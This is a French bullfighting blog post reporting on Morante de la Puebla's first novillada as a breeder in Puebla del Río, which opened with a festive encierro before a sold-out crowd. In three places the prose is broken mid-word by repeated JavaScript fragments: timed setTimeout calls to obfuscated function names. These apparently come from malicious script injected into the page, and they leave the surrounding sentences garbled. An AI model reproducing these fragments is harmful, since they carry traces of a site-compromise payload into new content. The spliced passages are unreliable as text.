PLUS DE BILLETS

C’est arrivé samedi dernier, à Puebla del Rio, terre de toreros, de toros et de cavaliers, et berceau du matador le plus artiste qui foule aujourd’hui nos arènes : Morante de la Puebla. Précisément, propulsé par celui-ci et avec la collaboration de la mairie de cette localité sévillane, a été organisé, pendant les festivités de Saint Sébastien, une novillada non piquée où le torero de La Puebla débutait en tant qu’éleveur.

Or ce qui a été une nouveauté et une réussite, parce que c’était vraiment attendu, ce fut l’idée morantiste d’un prologue inédit sur ces contrées sévillanes : un encierro, dans l’esprit de San Fermin, avec les novillos de l’après-midi. Partant du raisonnement, d’après lui, que les arènes où sont programmés des encierros se portent bien, Morante a voulu instaurer ce qui pour l’occasion fut une nouveauté –mais avec la prétention que cela devienne une tradition- en cherchant un complément plus populaire et festif au rite sérieux du toreo. Le succès fut total, car trois heures avant que le torero de La Puebla n’allume la mèche de la fusée marquant le départ, la longue rue où allait courir le bétail et ses alentours étaient noires de monde.

Morante, avec le béret bien calé et les cheveux longs style Che Guevara, moustache et longs favoris, mouchoir bleu et rouge –comme sa devise- au cou et un havane à la main, il voulut aussi participer comme coureur dans l’encierro de ses novillos, et il le fit accompagné par son cousin et valet d’épées Juan Carlos. Des données pour une éphéméride historique qui l’après-midi se confirmeraient par une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande affluence du public qui, au prix de dix euros la place, avait rempli –depuis la veille le « no hay billetes » y était affiché- les 3500 places des arènes portatives installées pour cette occasion.

Ambiance de gala, que l’on remarquait dans les restaurants, les bars et les cafés de cette localité, en compagnie d’une journée ensoleillée, et couronnée par le succès du spectacle, où se distinguèrent deux novillos du lot de celui de La Puebla –en particulier le troisième, et le cinquième auquel on attribua, sans doute pour récompenser l’ensemble, un tour de piste – et où le brillant nouvel éleveur fut sorti a hombros avec les cinq toreros à l’affiche : Daniel de la Fuente, Liqui ; Salvador Padilla ; Pablo Sobrino ; Jesús Muñoz et Antonio Novo. Que leurs noms deviennent comme des graines d’espoir, semées pour continuer à propager l’espérance dans l’avenir de la tauromachie.

Morante, que son village adore et qui répond toujours quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and on le sollicite, auréolé d’un halo bohême et même extravagant connu de tous, atteignit sa cible pour la promotion de la Fiesta enveloppant cette novillada de nouveaux venus dans une ambiance magique et festive qui transforma un simple événement en un moment mémorable. Ainsi grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andit l’aficion, on revitalise le vivier des nouveaux talents et on affiche la tauromachie au premier plan municipal et régional. Au-delà des succès des toreros et de l’éleveur, avoir réussi à afficher ce « no hay billetes » qui brille comme une fleur de printemps au milieu de l’hiver pour imprégner de parfums l’avant-scène de la saison. Il semblerait qu’il y ait « faim » de toros. Le cru taurin de 2015 s’annonce sous de bons auspices au sud.

CartelLa Puebla del Río

Les commentaires sont fermés.